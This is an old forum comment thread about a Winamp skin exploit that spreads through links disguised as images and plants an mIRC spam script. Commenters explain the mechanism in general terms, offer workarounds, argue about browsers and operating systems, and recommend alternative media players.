Winamp Skin Exploit in the Wild

An anonymous reader writes "Secunia.com has announced an exploit (derived from xml escaping the Internet zone into IE's local zone) that exploits Winamp's habit of automatically installing skins. Currently all versions of Winamp are affected. Details on the Winamp forums - apparently an exploit is already in the wild, and spreading."

yet another way...

[ryane67]

to compromise a system..

Luckily the masses of windows users are content to use windows media player which should slow the spread of this.

Re:yet another way...

[BoldAC]

Yet another way?

Seems like the same old crap to me...

You convince some sucker to download and load something that isn't what it says it is. We've reported aim exploits that hide themselves as screensavers recently.

It's a major security problem when a program blindly executes something. Period.

It's a major security problem when people download untrusted winamp skins on IRC.

What can you do?

Re:yet another way...

[black+mariah]

What can you do?

Well, when I'm dictator it will be legal to punch people in the face for doing stupid shit like that. Ought to help out a bit. Imagine a technician comes to your home, you tell them what's wrong and what you did... WHAM! A nice fist in the face. Hell of a deterrent, that.

Re:yet another way...

[Doctor+O]

At least where I work, that would make up a nice training, no more need for the gym. And there still is the possibility of the greatest career change EVAR:

Becoming a circus boxer.

One can dream, at least. ;)

Re:yet another way...

[Carnildo]

I'm using Winamp 2 skins on XMMS. Am I vulnerable to this?

Re:yet another way...

Use a firewall and don't give winamp access to the internet?

WTF else!

Re:yet another way...

[shish]

I think the safest thing to do would be to use Winamp 4; no exploits for that :)

Re:yet another way...

[Speare]

Imagine a technician comes to your home, you tell them what's wrong and what you did...

But do you have a 27B-6 form? I'm a bit of a stickler for details.

Re:yet another way...

I'm a moron and I got infected by this.
I clicked on a link that seemingly pointed towards a JPG image. (looked something like "http://somewhere.com/funnyporn.jpg --- LOOOOOOOOL"

It then asked me to download a ".wjz" or something.
I was quite drunk at the time, and thought it was a winamp audio stream, so I downloaded it.
It's a "Winamp Eztension" file, so it can provide limited capabilities (it cannot really execute it's own code, but it can manipulate IRC in order to tell IRC what music is playing etc)

It created a script to spam the link to the exploit in IRC, in order for others to click it.

It's relatively easy to get rid of, just go into the MIRC scripts viewer and delete the bad entries "it's called mirc-hax0r" or similar

Re:yet another way...

[homer_ca]

"when I'm dictator it will be legal to punch people in the face for doing stupid shit like that"

And once someone invents a way to punch people through the Internet your plan will be complete.

Re:yet another way...

Let's extend this to untrusted images, text files, emails, web pages, etc.

The actual problem is that something that is considered passive (like a skin, text document, image, etc) can do something active (such as compromising a system). Even if you know it's bad to execute untrusted executables, would you really stop and think twice about vieweing untrusted images, or in a similar way, using some noname Winamp skin? What's the worst that can happen? Make Winamp look ugly?

Re:yet another way...

[gangien]

what are you a Maddox wannabe?

Re:yet another way...

[Dmala]

And once someone invents a way to punch people through the Internet your plan will be complete.

Oh, man... whoever does that is gonna make a ton of money.

Re:yet another way...

What are you, a maddox fanboy?

Re:yet another way...

[gangien]

I like his 'work' but when i read that post i thought immediatly of maddox.

Re:yet another way...

[Yer+Mom]

Yeah! Now I can punch the monkey for real!

Re:yet another way...

[darkmeridian]

Well, when I'm dictator it will be legal to punch people in the face for doing stupid shit like that. Ought to help out a bit. Imagine a technician comes to your home, you tell them what's wrong and what you did... WHAM! A nice fist in the face. Hell of a deterrent, that.

I don't know about you, but that'd make me NOT call tech support.

Re:yet another way...

[Destoo]

This quote is currently in second place here

<Zybl0re> get up
<Zybl0re> get on up
<Zybl0re> get up
<Zybl0re> get on up
<phxl|paper> and DANCE
* nmp3bot dances :D-<
* nmp3bot dances :D|-<
* nmp3bot dances :D/-<
<[SA]HatfulOfHollow> i'm going to become rich and famous after i invent a device that allows you to stab people in the face over the internet

Re:yet another way...

[black+mariah]

Yeah, I can see why someone would get that idea. I like Maddox's stuff but I'm not trying to rip him off or anything. When I'm trying to rip someone off, I make sure you know it. ;)

Damn you Britney!

[ZipR]

I knew that your oh-so-sexy winamp skin would be my downfall.

Re:Damn you Britney!

I think this we can blame Frank Sinatra for this one though...

I've got you under my skin
I've got you deep in the heart of me
So deep in my heart, that you're really a part of me
I've got you under my skin

Re:Damn you Britney!

[ImaLamer]

This is somewhat relevant as its about an mp3 player... Free iPods. An actually legit pyramid scheme. There's a Wired article about it here. Check it out.

I notice however that you do post a referral link to freeipods.com... how horrible is that?

In fact, this seems to be against their terms of service.

(BTW, I see nowhere until signing up that you need to get 5 people to activate an account, damn pyramid schemes!)

Re:Damn you Britney!

[argStyopa]

I knew that your oh-so-sexy winamp skin would be my downfall.
Well duh.

Pretty Girl + Virus = trouble in just about any context.

Throw "wife" into the equation and the result may be expressed both in terms of $$ and an unreal number.

Mozilla

[linuxci]

One of the winamp betas had the option to use the mozilla engine rather than the IE one. Shame they never spent more time on this feature then they could easily tell people they could fix this exploit by turning off the MS Engine.

Re:Mozilla

[JanusFury]

Yeah, I remember that option. Funny, it never worked. I'm still not sure if it was Nullsoft's fault, or if moz embedding is just flaky. I can't really think of any apps I have that embed Gecko - it's all pretty much IE these days.

Re:Mozilla

[linzeal]

Isn't nullsoft part of AOL, which funded netscape which created most of the mozilla engine?

Using anything from Microsoft's API in this day and age of alternatives is lazy programing, imho.

Re:Mozilla

This isn't a IE exploit. It can affect Firefox too if your not carefull. It's entirly an Winamp exploit, cause even in firefox it will prompt you to download the file, and open it... if you open it, you're affected. :/

The link is dead now, but I'm guessing the exe file just looks to see if mIRC is running, and gets the path, and extracts+runs some mIRC scripts. Classic trojan technique. Really not terribly difficult to make.

^^^
taken from Winamp Forums.

So does it matter?

Re:Mozilla

[Neophytus]

The defunct minibrowser used the IE API to display html. Much easier for them to do that than to install gecko with the client.

Re:Mozilla

or maybe you just didn't follow instructions. you needed to register the mozilla activex control first. worked just fine for me after doing that.

Re:Mozilla

[Enrico+Pulatzo]

Reinventing the wheel for every project is a form of laziness too--you're too damn lazy to learn about existing APIs. Tools exist for a purpose, and people too lazy/prejudiced/"good" to use them should shut up, imho ;)

Re:Mozilla

Actually, it is funny you make this claim; because I can't think of any stable applications these days that embed IE. Come to think of it, the only app I can think of that embeds a browser and appears stable is
http://www.activestate.com/Products/Komodo/?_x =1

Re:Mozilla

[Aggrajag]

MyIE2 has embedded Gecko browser and it seems to work ok. http://www.myie2.com/

Re:Mozilla

[bannerman]

The Winamp loophole isn't that big of a deal, by itself. Sure, as a Mozilla user, if you download a skin made by some jerk who put a trojan into it you might get nailed. The real problem is that IE automatically installs the skins without user intervention. You all remember the email forward that went around telling people to delete the teddy bear icon from the windows\system folder, don't you? The one that made Windows unbootable? On a secure platform, you're safe unless you become gullible. Same deal here. The real security hole belongs to IE.

Re:Mozilla

[Quarters]

Maxthon (aka MyIE2) uses an ActiveX version of the Gecko engine. When Maxthon is in that mode most of the standard features don't work, the right-click menu is truncated down to just a few core items, and the overall experience isn't all that hot.

The author of Maxthon has said that the engine-switch option is there so web designers can check their pages quickly without having to have a multitude of browsers on their machines. It's not intended to be a generalized replacement for the IE libs that Maxthon is built on.

Re:Mozilla

[MustardMan]

Tools exist for a purpose, and people too lazy/prejudiced/"good" to use them should shut up, imho ;)

Even if those tools are poorly implemented, broken, full of security holes, or any of ten other negative things that can be said about many microsoft API's? (or indeed many non-MS API's as well - I'm not a complete zealout here) My point is, just because something is there already doesnt mean it's the best way to do it.

Re:Mozilla

[unixbob]

not quite. It's a cross browser problem because whatever browser you use will pass the .wsz or .wal straight to winamp. But the embedded browser in winamp (which is IE) executes an .exe that's included within the .wsz archive because it thinks it's being run from the local zone instead of the Internet Zone. Therefore it's a bug in IE and Windows (and winamp).

The bug isn't that the browser passes the file to the correct handler app, but that the app itself executes code it shouldn't.

Re:Mozilla

Are you suggesting that the Nullsoft programmers design and code a totally new operating system as well?

Re:Mozilla

[ricotest]

I was dead certain it used the IE engine, so I checked the new site at http://www.maxthon.com/ - lo and behold:

Maxthon is a powerful web browser with a highly customizable interface. It is based on the Internet Explorer engine (your most likely current web browser) ...

That said, the original MyIE2 site's screenshots do look a lot like Mozilla in places. But the site never mentions Mozilla, while Maxthon's (stupid name) site mentions IE explicitly.

Re:Mozilla

Not to mention Mozilla, Firefox, Thunderbird...

Re:Mozilla

[avdp]

I can think of a few apps that embed Gecko. Firefox is one of them (I know, it's also a Mozilla foundation project so it doesn't count). AOL's Compuserve embeds Gecko. ActiveState's Komodo embeds Gecko. A bunch of other programs on Linux embeds Gecko.

Re:Mozilla

[JanusFury]

Actually, it wouldn't work on my box even when I registered the activex control. I know, because I tested the activex control by itself in VB and it couldn't find some moz components. YMMV, I guess.

Re:Mozilla

[neocrono]

Alias Maya 6.0 has an embedded Gecko browser that's modified to support hyperlinks in MEL, Maya Embedded Language, giving it access to the majority of Maya's underpinnings. Every menu option or button in the program executes a MEL command (or several). Kinda wonder if that's exploitable. It also includes a customized java Apache httpd (I'm sure there's some subproject name I'm missing here) with search capabilities based on Lucene for all the online documentation.

Re:Mozilla

Why does a media player need a browser engine at all?

Re:Mozilla

then this is the fault of Winamp...and MS should sue them for introducing a hazard...

Re:Mozilla

[HobophobE]

Offtopic, etc. but I am curious.

How difficult (and guessing it's feasible, this is probably in the works) would it be to build with Mozilla an emulation of IE's embed? In other words, will there come a day when one could force a Mozilla embed by overriding the IE version?

Re:Mozilla

[Red+Alastor]

No, he suggest they use the best tools, not that they design some of their own.

Re:Mozilla

[irc.goatse.cx+troll]

That day is now, or some date in the past to be percise. Look for "IEpatcher.exe", I think its an official mozilla project tool.

Re:Mozilla

[ajs318]

If I had mod points, you would be Insightful. However, I haven't, so I'm replying. A media player does not need a browser engine. mpg321 hasn't got one, and it does just fine.

The real problem is that DOS was never designed to be networked, and that carried over into Windows. NT's access control is based on VAX/VMS, which is rather OTT for most people's requirements, and so most people simply don't use it. Unix/Linux/OSX access control, while less sophisticated, is at least more likely to be used properly.

Hardware no-execute (NX) is an absolute red herring in this context, BTW. It can always be bypassed in software -- otherwise you would have a Computationally Incomplete system -- and, if you can persuade a user to execute arbitrary software on a system without NX, you can just as easily persuade a user to execute the NX bypass exploit on a system with NX.

Re:Mozilla

[Keeper]

The "zone" the control uses is set by the application hosting the control. IE is doing exactly what winamp is telling it to. This problem is all winamp.

Re:Mozilla

[Snaller]

I can't really think of any apps that NEED to embed wither (expect MSIE).

Haven't seen Winamp, but i'd guess the interface looks screwed up - none of these programs seem to take into account that the user might have disabled stylesheets.

Re:Mozilla

[Enrico+Pulatzo]

To some degree yes. If I use an API that starts out insecure as long as I continue to still use that API, the provider can still fix the problems with that API so I don't have to re-invent the wheel. There are of course, some caveats, but poor implementations shouldn't prevent the usage of useful tools.

Can I name the worm??

[Lux]

I propose "flensing."

Re:Can I name the worm??

Congratulations, you made it to the 'f's.

Re:Can I name the worm??

[irc.goatse.cx+troll]

I'd go with another F, Flayer.
http://www.google.com/search?q=define%3A+ flay&btnG =Search&hl=en&lr=&ie=UTF-8&safe=off&c2coff =1
See Also: Buffy the vampire slayer, evil willow, 'Bored Now'.

Damn Britney Spears virus

Agh, give me viruses that delete my HD ; Give me viruses that break the whole box...

But please God, dont give us forced Britney Spears !

Further evidence that skinning is stupid

[pestie]

Seems to me I was just bitching about skinning and mentioned that security holes were one possible (but unlikely) down-side. I love when the universe makes my point for me.

Re:Further evidence that skinning is stupid

[jo42]

Alas, people like shiny, blinky, glowy things aka bling.

I won' bother saying what I think of 'skinning' on account it would be moderated as a troll or less because most people like shiny, blinky, glowy things aka bling and I don't...

Re:Further evidence that skinning is stupid

[name773]

which is another great use of anonymous posting :)

Re:Further evidence that skinning is stupid

[Neon+Spiral+Injector]

If I were to like shiny, blinky, glowy things aka bling, which I don't, I'd want my entire UI to be shiny, blinky, glowy things aka bling. I find apps that don't use the default toolkit (in any OS) to really clash with everything else.

Sure MacOS X is pretty, and consistant. It would seem that Apple agrees with me. So why do they make their QuickTime player for Windows so out of place? I like non-destructive configuration options to be be auto applied (like GNOME and Mac OS do), but that style of interface is in total contract with Windows OK, Apply, Cancel system.

I think it was Winamp's fault that all media players now have to have their own skinable widget set. I wish this exploit would do something to stop the madness, but I fear not.

Re:Further evidence that skinning is stupid

[StalinsNotDead]

There are those that either forget to check Post Anonymously or out of some measure of honor or apathy, refuse to do so.

Re:Further evidence that skinning is stupid

[It'sYerMam]

I can say that I do like pretty media players. The thing is, the standard GUI is not designed with a Hi FI in mind - It has buttons with little triangles, squares, circles, vertical lines, volume knobs, trays, etc. You can't do this in a regular toolkit, so I think it's nice to get this back.
I mean, no-one complains that the Hi-Fi is in a different style to the table - that's because they're completely different things.

Difficult to put my finger on it, but I like being able to select a beautiful, shiny, fake-LEDy skin to make my media player MINE.

Re:Further evidence that skinning is stupid

[Carnildo]

I like skinning because it lets me turn whatever unusable monstrosity the developer thought was "cool" back into something usable.

I also like skinning because it's a suitable punishment for those developers.

Re:Further evidence that skinning is stupid

[xmundt]

Actually, I kind of like skinning...although I don't "need" it. For example, Opera has a skin called "Executive" that is my preferred look. Why? not because I am "C" level, but, because I am a woodworker!
ALso, the whole point of computers is to allow flexibility and the ability to customize the tool to fit our hand.
I do, though, draw the line at methods of skinning that end up being security risks... I am not sure that skins that have executable parts are a good thing...

Re:Further evidence that skinning is stupid

[Nurgled]

Why does the application have to look like a hi-fi? It's thinking like that which brings us twisty knob widgets to operate with the mouse, and millions of users who try to carefully articulate the mouse in small circles to operate it, only to be frustrated and confused when the bottom part of the motion reverses what the top part did.

Metaphors can be nice, but just having buttons with the familiar play, stop and pause buttons would be enough for this kind of interface.

Re:Further evidence that skinning is stupid

[Proc6]

Along this line, can anyone recommend a Windows based media player that plays most all formats (mp3, divx, avi, mpeg, whatever), that ISNT some overly feature laden, skinnable piece of Britney candy?

WMP and RealPlayer make me gag. WinAmp can probably be skinned lame, but it seems to not play DiVX so very well (and still its a zillion feature candy looking player).

Anything for the minimalist? Id like a standard windows UI screen and basic buttons, is that so hard?

Re:Further evidence that skinning is stupid

[Neon+Spiral+Injector]

As much as I complained, I'm surprized that I've never tried it, but I have heard very good things about Media Player Classic. Maybe I'll give it a shot now too.

Re:Further evidence that skinning is stupid

[Condor7]

Can anyone recommend a Windows based media player that plays most all formats (mp3, divx, avi, mpeg, whatever), that ISNT some overly feature laden, skinnable piece of Britney candy?

Media Player Classic at SourceForge, Afterdawn, or Divx Digest.

Re:Further evidence that skinning is stupid

I like skinning, because I like to use Opera, but Opera's default look is butt-ugly.

Re:Further evidence that skinning is stupid

[irc.goatse.cx+troll]

Mplayer is nice, though theres no good win32 gui for it yet.
http://ftp5.mplayerhq.hu/mplayer/releases/wi n32-be ta/
Maybe someone can roll something simple out to wrap it like kmpg123 does mpg123?
(btw, I know gmplayer runs on windows also, but thats still way too buggy, in addition to being just as bad in the bling-over-features department as everything else)

Re:Further evidence that skinning is stupid

[Proc6]

After the posts above recommended it, I am using the Media Player Classic from Sourceforge, and it's _exactly_ what I was looking for. Its like the old school Windows 95 media player. Simple, to the point. Loads fast. Its like 1.5 megs. Why can't more software be like this :`(

Re:Further evidence that skinning is stupid

[irc.goatse.cx+troll]

sidenote: you can still get the oldschool windows media player, start -> run mplayer2. Unless you mean the old old media player (~win3.11 era), which is around there somewhere but cant think of the name.

Re:Further evidence that skinning is stupid

[It'sYerMam]

Well, that's what the forward triangle, triangles + bar, two bars and square are for. Surely you recognise them?
Not sure what you mean about "the bottom part of the motion..." but yes, twisty knob widgets can be extremely annoying. OTOH, many skins come without them - you're not forced to use them.
There are so many different skins that you have both the convoluted and the simple - pick what you want.

Alternatively, use rhythmbox or something.

Re:Further evidence that skinning is stupid

[djtrialprice]

Unless you mean the old old media player (~win3.11 era), which is around there somewhere but cant think of the name.

It's called sndrec32 (still on WinXP) and I occasionally still use it. I always thought it was pretty cool. Who doesn't want to listen to their music backwards?

Just another reason

[bunburyist]

To use XMMS! XMMS is a wonderful media player XMMS is a multimedia player for unix systems. XMMS stands for X MultiMedia System and can play media files such as MP3, MOD's, WAV and others with the use of Input plugins. XMMS is mainly targeted at music playback, but through thirdparty plugins some rudimentary video capabilities exists, but there are much better systems other than XMMS for video support. XMMS will not be vulnerable to this exploit...it is Highly customizeable and it has an extensive plugin system. Winamp is (currently) being run by AOL which as we all know is evil and heartless...after what they did to poor rich justin. poor poor justin.

Re:Just another reason

[happyemoticon]

Damn dude, I was going to step up and prosleritize 'NIX/XMMS, but you beat me to it:) By the same token you could support good ol' Winamp 2, which is basically the same thing. Ooo, winamp 5; look at all the useless, animated, colorful features!

Re:Just another reason

[Kethinov]

AFAIK XMMS doesn't run in Windows at all.

Re:Just another reason

[shawn(at)fsu]

XMMS has been included in SuSElinux since at leats 8.2. It's great, it has the interface of winamp with none of the bloat that I've come to hate from winamp. Check it out

I didn't think this was redundent at all good thing I browse at -1.

Re:Just another reason

[Kethinov]

Winamp5 added one very important feature that Winamp2 didn't have (that XMMS has had for years); the ability to reformat the playlist display away from Artist - Song Name to whatever you want. (In my case Artist - Album - Track - Song Name)

Re:Just another reason

[name773]

see? more of a fix than you'd first assume :)

Re:Just another reason

[name773]

500 dollar reward for tip(s) leading to the arrest of the person(s) who stole my sig.
they went that way ->

Re:Just another reason

[datadriven]

Another reason I'm glad I don't use windows.

Re:Just another reason

[Saganaga]

Not true. Winamp2 allows you to change the playlist display. From memory (I have WA5 so it may be different now): Preferences->Plugins->Input->Nullsoft MPEG Audio Decoder->Configure.

I always changed this to show the album like you mentioned.

Re:Just another reason

[rokzy]

Get the crossfade plugin.

XMMS+Crossfade is great for things like LOTR soundtrack or just regular albums where songs go over tracks - no horrible pauses.

I just wish it had decent album management. imo Musicmatch Jukebox has the best library management system.

Re:Just another reason

[Kethinov]

I imagine you could use Cygwin to compile X and then compile XMMS. Winamp skins are compatible with XMMS but XMMS doesn't use IE.. or any browser.. for anything. That would eliminate the security risk.

Of course unchecking "modern skin support" in Winamp would remove the security risk as well.

Re:Just another reason

[Kethinov]

Good fuckin lord. Way to hide it on me.

I tried literally for years to find a way to do that in Winamp2 unsuccessfully. Nullsoft would get a -4 on a scale of 1 to 10 in option menu design.

Re:Just another reason

[Saganaga]

I agree. I just happened to stumble on the option. I have a sort of obsessive/complusive tendency to check out every single possible option in a program, so I guess that's why I found it.

Re:Just another reason

[Kethinov]

Blow me. Not a single person I know knew about Winamp2's ability to do that. We all welcomed Winamp5 with open arms for that ability. Did it occur to you that Nullsoft might just have made a dumb choice regarding where to put that option? Stupid anonymous flamers.

Re:Just another reason

[Osty]

XMMS is a wonderful media player XMMS is a multimedia player for unix systems

(emphasis added by me)

And Winamp is a multimedia player for Windows systems (with the exception of a horribly crappy alpha version of the now-dead 3.0 release of Winamp that was made available on Linux, but that hardly counts does it?). If I'm a Winamp user, I'm using Windows, and so XMMS is not an option. Why would I change my entire operating system simply to get a media player that started life as a duplicate of the one I already have on Windows (and XMMS still is little more than a Winamp-wannabe)?

Re:Just another reason

[mla_anderson]

No need to compile X for Cygwin, it's already done for you.

Re:Just another reason

Why would I change my entire operating system simply to get a media player

If you didn't know what Word documents are like to Linux users, you do now :-)

Re:Just another reason

[JAD+lifter]

I am too lazy to go look on bugtraq but I seem to remember a while back there was a root level exploit for systems running XMMS. So nothing is perfect, although XMMS probably still is better than winamp.

Re:Just another reason

[JAD+lifter]

XMMS has been included in SuSElinux since at leats 8.2.

I think that like every single linux distro that I have ever used came with XMMS. As far as SuSE is concerned, I have a SuSE 7.3 install DVD and it has XMMS on it and I am sure that every earlier version does as well. XMMS is probably one of the most common nonessential pieces of software included with most distros when you really think about it.

Re:Just another reason

[JAD+lifter]

If you didn't know what Word documents are like to Linux users, you do now :-)
I have never come across a word document that I couldn't view on Linux. I am sure that you could create one but I don't think that most people use the really flaky complex features of Word that all the Linux equiv of Word cannot handle.

Am I the only one...

[psoriac]

who unchecks every option in any program I install that begins with "Automatically [check for/download] and install ..."?

Re:Am I the only one...

Pretty much, yes.

Re:Am I the only one...

[Frnknstn]

In this case it is worse than that. I also always uncheck those options, and selected to have no file types associated to Winamp. Winamp automatically associates itself with the .WSZ and .WAL files regardless of the options you select.

Re:Am I the only one...

[telstar]

I dunno, but I like posts whose entire message changes if you neglect to read the subject.

Re:Am I the only one...

[conteXXt]

nope. there are many of us. Rise UP

Re:Am I the only one...

[traveyes]

automatically, i uncheck anything "automatic".

.

Re:Am I the only one...

who thought you should have said it like this?

who likes posts whose entire message changes if you neglect to read the subject?

Re:Am I the only one...

You're not the only one, but I've found that when I help friends set up windows (for example) I have to resist the urge, because if I don't leave windows update at least automatically downloading patches, they will never do it themselves, no matter how often I remind them.

I know for a fact that those of us who check through every option for every new program are a dying breed, and I'd also just like to throw in a little random hatred for programmers who split up their programs options among several different menus; you guys SUCK!

Re:Am I the only one...

who agrees?

Re:Am I the only one...

[Snaller]

Yeah, i'm sure a lot of us check things he installs :)

Re:Am I the only one...

[DNS-and-BIND]

Then you get nag screens every time you start the product, asking you if you want to download and install the latest version (Acrobat, looking at you).

Macs

[AKAImBatman]

Makes me glad I use iTunes on a Mac. At least Apple doesn't decide *for me* that I NEED an insecure web browser in EVERY APPLICATION on the operating system.

The fact that OS X has not yet had one critical exploit speaks for itself. (And yes, OS 7-8 *did* have quite a few exploits and viruses.)

Re:Macs

[black+mariah]

The Winamp programmers made a choice to use the IE shit, moron. If you're going to flame, at least be somewhat intelligent about it.

Re:Macs

[AKAImBatman]

That should be OS 7-9. I've really got to start proof reading.

Re:Macs

[Egekrusher2K]

http://secunia.com/advisories/11622/ Yes it has, wannabe nerd. Don't talk the crap unless you can back it up.

Re:Macs

[EulerX07]

You also have to start knowing what you're talking about.

Re:Macs

[AKAImBatman]

RTFA. It requires Internet Explorer 5.2. That's not the default browser on Mac OS X.

Re:Macs

[AKAImBatman]

No, they used system services available to them, instead of choosing a third party solution like the rest of the world does. Why did they do that? Because Windows integrates a web browser!

Re:Macs

[Kethinov]

They integrate a shitty web browser. No programmer in their right mind would make use of this "available system service".

Re:Macs

you mean that article that says:
This has been confirmed on Macintosh OS X using Safari 1.2.1 (v125.1) and Internet Explorer 5.2. Other browsers and applications supporting URI handlers may also be used as attack vectors.

so, what is the default browser on a Mac these days?

i see Safari in TFA

Re:Macs

[Egekrusher2K]

I didn't say it was common. He said they don't exist. I was merely proving him wrong.

Re:Macs

[name773]

would this help it out?

Re:Macs

Hate to break it to you, but that's not a critical exploit. In order to do damage, the user MUST have a script lying around that can do said damage, and the attacker MUST know what that script is. Even assuming that the attacker does find a shortcut to 'rm -rf /', he still can't delete system files thanks to the system's security.

A "major" rating perhaps, but definitely not Critical.

Re:Macs

[BoldAC]

Where you do see this quote?

Re:Macs

[Davak]

Can anybody confirm this quote?

I can't find it anywhere...

Re:Macs

You're just jealous. ;-)

Re:Macs

[Gadget_Guy]

It was in the link from a message posted by Egekrusher2K (610429) a few messages up the chain from here.

It was in reply to someone who said that MacOS X had no problems like this Winamp one. It was not referring to the original Winamp problem itself.

Re:Macs

[Phroggy]

Makes me glad I use iTunes on a Mac. At least Apple doesn't decide *for me* that I NEED an insecure web browser in EVERY APPLICATION on the operating system.

I realize you're trolling, but I'm bored...

Yes, Apple DOES decide for you that you need a web browser in every application on the operating system. Is it insecure? Well, not that we know of right now, because Apple patches the holes when they're found, just like Microsoft does (but yes, Apple's browser does have fewer security holes than Microsoft's).

Safari is 13MB, 10.1MB of which is localized text (for menus, dialog boxes, etc.) for languages other than English. It would be less than 3MB if you stripped that out (and you can get a program to do that for you, system-wide, if you want). Why? Because it doesn't include the HTML rendering engine.

The fact that OS X has not yet had one critical exploit speaks for itself. (And yes, OS 7-8 *did* have quite a few exploits and viruses.)

Wrong again. According to Steve Jobs:

In Mac OS X's history--four and a half years--we've had 43 security updates fixing security issues, but only 2% of them were critical. In Windows XP, which has been around for less time, they've had 77 security updates but 66% of them were critical in terms of the industry's nomenclature.

By the way, if you're interested in the HTML rendering engine that Apple includes in Mac OS X and makes available to all applications (just like Microsoft does), the source code is here (it's LGPL). OK, so that's not like Microsoft. ;-)

Simple solutions

[JLSigman]

Don't get your skins from anyone but WinAMP.

OR

Don't use skins at all.

Re:Simple solutions

[fulana_lover]

the article mentioned specifically the problem is that wsz skins are able to escape IE's security policies and run as local computers when sent as XML files, so a malicious website (or HTML email, message board posting, etc) could automatically run the exploit without even your knowledge... time to uninstall winamp...

Re:Simple solutions

[MalaclypseTheYounger]

OR use iTunes. As a non-mac user and all-around Macintosh-detester, iTunes is pretty damned slick.

No issues with it so far, and it handles my 2000+ MP3 database with ease. (Last time I used WinAmp... in the great words of Jon Stewart... eh, not so great-- very choppy).

Re:Simple solutions

[linzeal]

This could be hidden in a page that is completely unrelated to winamp or skinning and it would still work.

Re:Simple solutions

From a quick review of the winamp forum, installing a skin isn't how it's propogated.

It gets winamp to run executable code embedded in the skin.xml file, but the whole thing is an exploit of your browser and mime types.

That is, you think think you're going to see a jpeg, your browser sees javascript that forwards it to a php page that sends a winamp file.

Your browser sees it's a winamp file, sends it to winamp, who then runs the code.

If you use winamp and your browser's set to open winamp-associated stuff, you're at risk it looks like.

Re:Simple solutions

[_Sprocket_]

Don't get your skins from anyone but WinAMP.

That would be fine advise if the victims knew they were downloading a Winamp skin. The link, however, looks like it is an image file:

http://socold.de/stuff/schnappi_death.jpg <----- LOOOOOOOOOOOOOOOOOOOOL

Going clicky-clicky (or otherwise following the link) exacuted a PHP script which would serve up a winamp skin. Since many users have their browsers automagically handle Windamp skins, it would immediately get handed off to Winamp to execute. The skin linked to several files that eventually called an executable within the skin package which in turn loaded one's mIRC client with a script that spat out the above message.

The victims probably didn't know what hit them.

Re:Simple solutions

[maximilln]

who then runs the code

Winamp parses the XML file which contains an embedded link to the .exe in the Winamp skin archive.

Why are markup languages allowed to link to executables? Allowing arbitrary hotlinks to an untrusted location without proper validation is a security hole the size of an aircraft carrier.

Re:Simple solutions

No... I'm not that desperate yet.

Re:Simple solutions

[nkh]

It's too late for me to post this but there is a plug-in on the Winamp web site that is developped by a spyware company (can't remember the name): the plug-in shows you a girl dancing and of course it's sending a lot of packets throught the internet. The plug-in is available on Winamp's web site!

Re:Simple solutions

LOOOOOOOOOOOOOOOOOOL

?

It wasn't that funny.

paynoattentiontomeiamjustgettingthelowercasetoca psratiodown

Re:Simple solutions

[Ziffy]

I have around 1500 (mp3/ogg/flac/mpc/mod/spc) files in my playlist, and Winamp still handles perfectly. My system isn't exactly bleeding-edge, either.

Re:Simple solutions

What do you want him to do, lie? And make up some random message rather than the one the worm gives you?

Re:Simple solutions

You should be "exacuted" for your atrocious spelling.

Re:Simple solutions

[bigberk]

The link, however, looks like it is an image file:

I wrote a small windows program called popURL that let's you quickly get info on a URL such as the file size, MIME type (important obviously), even software running on web server (IIS etc.)

Re:Simple solutions

[gordgekko]

Eh? I have a 4000+ MP3 database that WinAmp has no problem with, and my PC is hardly bleeding edge.

Re:Simple solutions

[recursiv]

But a local hard drive is considered a trusted location.

Re:Simple solutions

[_Sprocket_]

It may not be that funny. But it is a direct quote.

Re:Simple solutions

Maybe he tried WinAmp 3, Winamp 3 used to run like crap on my work machine, while at the same time Winamp 2 was running perfectly on my machine at home which was about 3 years older.

As long as...

Just as long as the exploit isn't used to install SP2 were all safe.

Re:As long as...

funny?!?!

since when is trolling worth a +5 funny???

Stop with the hate group propaganda already, this is really old and tiresome, as more and more of the MATURE slashdot croud leave for another site that acts mature and helpful no matter what the OS is.

Easy fix

[shams42]

It seems that this is easy to fix for now by simply configuring your firewall to not allow Winamp to access the network.

Re:Easy fix

[Robotech_Master]

Of course, then you can't listen to Internet radio...

Re:Easy fix

[MyDixieWrecked]

It seems that this is easy to fix for now by simply configuring your firewall to not allow Winamp to access the network.

but um... what about listening to internet radio stations? how about when you use it to sample music online? a lot of those online music sites (mp3.com for example) have a .m3u file to preview the songs in winamp.

Re:Easy fix

[mlyle]

Wrong. All you need to do is open a wsz file in order to get exploited-- subsequent network access isn't required. And internet explorer is happy to auto-open that wsz file for you.

All versions are affected?

[httpamphibio.us]

The Securia.com link in the profile says that only Winamp 3.x and 5.x. But doesn't mention 2.x... the vast majority of Winamp users I know don't use 3.x or 5.x due to the massive feature bloat.

Is 2.x actually susceptible or is the submitter incorrect?

Re:All versions are affected?

[Will+Fisher]

Winamp 2 is NOT affected. Winamp 5 Lite is also NOT affected.

If you unchecked "Modern Skin Support" in the installer you are also NOT affected.

You can even remove Modern Skin Support just by renaming Program Files\Winamp\Plugins\gen_ff.dll to gen_ff.dll.old. This will remove the exploit.

If you fix this way, you will only be able to use classic skins.

Re:All versions are affected?

Version 5 does not have a massive feature bloat: it has elements of 3 without the bloat of 3.

Re:All versions are affected?

[lotsofno]

.
What many people don't realize is that Winamp 5 IS Winamp 2 (Check out this this article.). It's the same code, but with extra plug-ins bundled in. The user can choose which plug-ins or features he wants to include or not include when installing. So I'm not sure how you could call the application bloated when the app installs only what the user feels he or she needs.

Re:All versions are affected?

YEAH BAYBEEE!!!

Winamp 2.x r0x0rz! the later winamps are way to big and obnoxious. The only problem is that winamp 2.x keeps bugging me to update to later versions...

Re:All versions are affected?

[Carnildo]

Winamp 5 is Winamp 2 + Winamp 3's skinning abilities. Hence the name.

Re:All versions are affected?

I thought it was because the number 4 is an unlucky number in many parts of Asia.

Re:All versions are affected?

[traveyes]

fwiw:

winamp 5 at this moment, minimized (no support for "modern skins") is using 1,432K of memory.

wmplayer, playing the same song, in compact mode, minimized, is at 12,788K.

and yes, smartasses, it sounds wierd with the same song playing twice... way out of phase.

.

Re:All versions are affected?

[Alsee]

The obvious workaround seems to be to go into Folder Options - File Type associations and just delete the WSZ association (winamp extension installation file).

Poof! No more skin files launch!

Why hasn't anyone else suggested this? Am I missing something here?

-

Re:All versions are affected?

[rmull]

Also for what it's worth, those numbers probably don't mean much. If it's what you get out of windows task manager, then they indicate the size of the program's virtual address space, which includes pages from libraries they use that have been mapped in. Which means two things: 1) the memory may be shared with other apps, and 2) the memory may not even be in physical memory, but on disc and never actually loaded.

